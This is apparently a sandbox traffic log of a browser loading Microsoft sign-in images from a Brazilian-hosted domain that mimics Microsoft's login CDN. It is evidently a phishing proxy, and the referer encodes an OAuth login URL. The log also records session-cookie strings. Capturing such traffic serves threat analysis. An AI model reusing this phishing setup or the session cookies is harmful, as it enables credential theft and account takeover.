                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:53 UTC785INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:53 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 673
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Wed, 12 Feb 2020 22:01:30 GMT
                                                        ETag: 0x8D7B0071D86E386
                                                        x-ms-request-id: 1018200e-f01e-007c-565b-97d204000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164253Z-17fdc58fdbcdv6l8hC1NYCha0400000003qg000000003us8
                                                        x-fd-int-roxy-purgeid: 4554691
                                                        X-Cache: TCP_MISS
                                                        Accept-Ranges: bytes
                                                        2025-03-17 16:42:53 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                        Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.44978823.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:52 UTC3308OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:53 UTC780INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:53 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 1435
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT
                                                        ETag: 0x8D79B8373CB2849
                                                        x-ms-request-id: 0f35ee1d-201e-0043-365b-97250a000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164253Z-r1769bfd58bjlgqghC1YTO99gw00000004rg0000000028cb
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_MISS
                                                        Accept-Ranges: bytes
                                                        2025-03-17 16:42:53 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                        Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.44979423.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:54 UTC1957OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:54 UTC762INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:54 GMT
                                                        Content-Type: image/gif
                                                        Content-Length: 2672
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Last-Modified: Fri, 17 Jan 2020 19:28:37 GMT
                                                        ETag: 0x8D79B83739984DD
                                                        x-ms-request-id: b067beb7-b01e-0033-805b-979cfd000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164254Z-r1769bfd58bh7msmhC1YTO6qhg00000003vg000000007ex2
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L2_T2
                                                        X-Cache: TCP_REMOTE_HIT
                                                        Accept-Ranges: bytes
                                                        2025-03-17 16:42:54 UTC2672INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e 69 18 14 00 21
                                                        Data Ascii: GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~i!


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.44979323.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:54 UTC1938OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:54 UTC738INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:54 GMT
                                                        Content-Type: image/x-icon
                                                        Content-Length: 17174
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Last-Modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                        ETag: 0x8D8731230C851A6
                                                        x-ms-request-id: 43d66909-901e-0018-160f-96239c000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164254Z-186895dd8bddc5hwhC1EWR2xzg00000004s0000000006qg1
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2025-03-17 16:42:54 UTC15646INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                        Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                        2025-03-17 16:42:54 UTC1528INData Raw: 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22
                                                        Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.44979123.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:54 UTC1951OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:54 UTC755INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:54 GMT
                                                        Content-Type: image/gif
                                                        Content-Length: 3620
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT
                                                        ETag: 0x8D79B8373B17F89
                                                        x-ms-request-id: 886a0625-801e-0038-7f5b-976796000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164254Z-r1769bfd58bswlsvhC1YTOy2h0000000082000000000bc9a
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        X-Cache-Info: L1_T2
                                                        Accept-Ranges: bytes
